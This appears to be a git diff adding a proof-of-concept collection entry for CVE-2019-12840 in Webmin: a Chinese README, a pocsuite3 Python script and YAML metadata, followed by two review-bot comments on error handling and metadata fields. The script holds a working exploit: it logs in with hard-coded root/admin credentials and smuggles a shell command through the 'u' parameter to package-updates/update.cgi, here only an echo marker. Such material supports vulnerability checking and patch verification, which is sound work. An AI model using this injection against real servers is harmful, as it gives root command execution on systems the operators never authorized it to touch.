diff --git "a/cve/webmin/2019/CVE-2019-12840/POC\346\210\220\345\212\237\345\233\276\347\244\272.png" "b/cve/webmin/2019/CVE-2019-12840/POC\346\210\220\345\212\237\345\233\276\347\244\272.png"
new file mode 100644
index 0000000000000000000000000000000000000000..d3fddbb6bf99e979f8ca9d103a74c46cb8d4493a
Binary files /dev/null and "b/cve/webmin/2019/CVE-2019-12840/POC\346\210\220\345\212\237\345\233\276\347\244\272.png" differ
diff --git a/cve/webmin/2019/CVE-2019-12840/README.md b/cve/webmin/2019/CVE-2019-12840/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..c3b773dc6bb4234cf784f61f6a9a2e955fb87fee
--- /dev/null
+++ b/cve/webmin/2019/CVE-2019-12840/README.md
@@ -0,0 +1,44 @@
+# CVE-2019-12840 Webmin认证后RCE
+
+## 漏洞分析
+
+任何通过认证的用户在使用 Package Updates模块时,处理数据时 $cmd 字段被直接拼接到命令上,使其可以通过向后端 update.cgi 传递 post 类型数据来以root权限执行任意命令。
+
+## 工具
+
+### 语言
+
+- Python 3
+
+### 第三方库
+
+- pocsuite3
+
+- Beautifulsoup
+
+```bash
+pip3 install pocsuite
+pip3 install bs4
+```
+
+## 使用步骤
+
+可通过 vulhub 项目部署漏洞环境 docker 服务到本地 192.168.114.148:10000
+
+依据现实情况更改 POC 中 user 和 password 字段,使得成功登录。
+
+输入命令:
+
+```bash
+pocsuite -r Webmin_package_update_none_0_remote_command_execute_php_poc_cve_2019_12840.py -u https://192.168.114.148:10000
+```
+
+POC 中执行回显随机字符串命令:
+
+```python3
+cmd = "echo jjtsrlbnyyhm"
+```
+
+出现图示表示漏洞存在:
+
+![](./POC成功图示.png)
diff --git a/cve/webmin/2019/CVE-2019-12840/Webmin_package_update_none_0_remote_command_execute_php_poc_cve_2019_12840.py b/cve/webmin/2019/CVE-2019-12840/Webmin_package_update_none_0_remote_command_execute_php_poc_cve_2019_12840.py
new file mode 100644
index 0000000000000000000000000000000000000000..e1479e509711874c4c4d574ff4dc8631ec95de16
--- /dev/null
+++ b/cve/webmin/2019/CVE-2019-12840/Webmin_package_update_none_0_remote_command_execute_php_poc_cve_2019_12840.py
@@ -0,0 +1,90 @@
+from pocsuite3.api import Output, POCBase, register_poc, requests
+from pocsuite3.lib.core.data import logger
+from bs4 import BeautifulSoup
+
+class DemoPOC(POCBase):
+ vulID = 'CVE-2019-12840'
+ version = '1.0'
+ author = ['Picasso']
+ vulDate = '2019-06-15'
+ createDate = '2019-06-15'
+ updateDate = '2020-08-24'
+ references = ['https://nvd.nist.gov/vuln/detail/CVE-2019-12840']
+ name = '认证 Webmin 包更新远程命令执行漏洞'
+ appPowerLink = ''
+ appName = 'Webmin'
+ appVersion = '1.910'
+ vulType = 'PACKAGE UPDATE REMOTE COMMAND EXECUTE'
+ desc = '''Webmin 1.910以及之前版本,任何认证后的用户通过"Package Updates"模块可以以root权限执行任意命令. '''
+
+ def _login(self):
+ logger.info("logging in ...")
+ session = requests.Session()
+ session.cookies["testing"] = "1"
+ data = {'page': '', 'user': "root", 'pass': "admin"}
+ loginurl = self.url + "/session_login.cgi"
+ try:
+ res = session.post(loginurl, data=data, verify=False, allow_redirects=False)
+ if res.status_code == 302 and session.cookies["sid"] != None:
+ return session.cookies["sid"]
+ except:
+ logger.warn("Failed to login!!")
+ return "Failed"
+
+ def _check(self,sid):
+ cmd = "echo jjtsrlbnyyhm"
+ logger.info("Sending command ...")
+ session = requests.Session()
+ referer = self.url + "/package-updates/update.cgi?xnavigation=1"
+ cookies = "Cookie: redirect=1; testing=1;sid=" + sid
+ headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0",
+ "Connection": "close",
+ "Content-Type": "application/x-www-form-urlencoded",
+ "Referer": referer,
+ "X-Progressive-URL": self.url + "package-updates/update.cgi",
+ "X-Requested-From": "package-updates",
+ "X-Requested-From-Tab": "webmin",
+ "X-Requested-With": "XMLHttpRequest",
+ "Cookie": cookies
+ }
+ data = "mode=updates&search=&u=apt/apt&u=;" + cmd + ";/apt&ok_top=Update+Selected+Packages"
+ updateurl = self.url + "/package-updates/update.cgi"
+ try:
+ res = session.post(updateurl, data=data, headers=headers, verify=False)
+ if res.status_code == 200 and "jjtsrlbnyyhm" in res.text:
+ soup = BeautifulSoup(res.text, 'html.parser')
+ output = soup.find_all('pre')
+ return output
+ except Exception as e:
+ logger.warn(str(e))
+ return False
+
+ def _verify(self):
+ result = {}
+ sid = self._login()
+ if sid != "Failed":
+ sid = sid.strip()
+ else:
+ return self.parse_output(result)
+
+ p = self._check(sid)
+ if p:
+ content = p
+ result['FileInfo'] = {}
+ result['FileInfo']['Filename'] = "Feedback"
+ result['FileInfo']['Content'] = content
+ return self.parse_output(result)
+
+ def _attack(self):
+ return self._verify()
+
+ def parse_output(self, result):
+ output = Output(self)
+ if result:
+ output.success(result)
+ else:
+ output.fail('target is not vulnerable')
+ return output
+
+register_poc(DemoPOC)
diff --git a/cve/webmin/2019/yaml/CVE-2019-12840.yaml b/cve/webmin/2019/yaml/CVE-2019-12840.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..1112f170b607c15cf3044a62ddd9e8e4d7085ea3
--- /dev/null
+++ b/cve/webmin/2019/yaml/CVE-2019-12840.yaml
@@ -0,0 +1,19 @@
+id: CVE-2019-12840
+source: None
+info:
+ name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。
+ severity: High
+ description: |
+ Webmin 1.910以及之前版本,任何认证后的用户通过"Package Updates"模块可以以root权限执行任意命令.
+ scope-of-influence:
+ Webmin <= 1.910
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-12840
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2019-12840
+ cwe-id: CWE-78
+ cnvd-id: CNVD-2019-19305
+ kve-id: None
+ tags: cve2019, rce
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 9fdf2623ad2b75e42ebfe295c9b979dea2af2983..16420afa62de66a6e7aa5a762ea4c0ed3b069038 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -168,6 +168,7 @@ cve:
 - CVE-2022-22963
 - CVE-2022-31692
 webmin:
+ - CVE-2019-12840
 - CVE-2022-0824
 - CVE-2022-36446
 Zimbra:
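Review bot: A failed login is reported as `target is not vulnerable`, because in `_verify` the `sid == "Failed"` branch passes the empty `result` to `parse_output`; a run with wrong credentials, an unreachable host or a TLS error therefore reads as a clean target. `_login` makes this harder to spot: its bare `except:` hides the cause, and a non-302 response returns `"Failed"` with no log line at all. I would log the exception the way `_check` does (`except Exception as e: logger.warn(str(e))`), read the cookie with `session.cookies.get("sid")` instead of relying on a swallowed `KeyError`, and end that path with its own message such as `output.fail('login failed, target not tested')`. The `root`/`admin` pair is hard-coded in `data` and the README asks users to edit the file by hand, so taking the credentials from run-time options would keep real passwords out of the source. Both `session.post` calls also pass `verify=False` and no `timeout`, so the password is sent without authenticating the server and a stalled host blocks the run.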
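Review bot: The `name:` field in CVE-2019-12840.yaml holds a description of the Webmin product rather than the name of the vulnerability, so a listing built from `info.name` will not say what this entry is; something like `name: Webmin Package Updates authenticated command execution` would match the `name` used in the PoC class. The `description` says any authenticated user is affected, whereas the NVD entry linked under `reference`, as I read it, limits the issue to users who are authorized for the Package Updates module. Stating that precondition matters to defenders, since removing that module from low-privilege accounts is a workable mitigation until the upgrade. `source: None` and `kve-id: None` parse as the string "None" in YAML; if "no value" is meant, `null` or an empty value is safer for consumers.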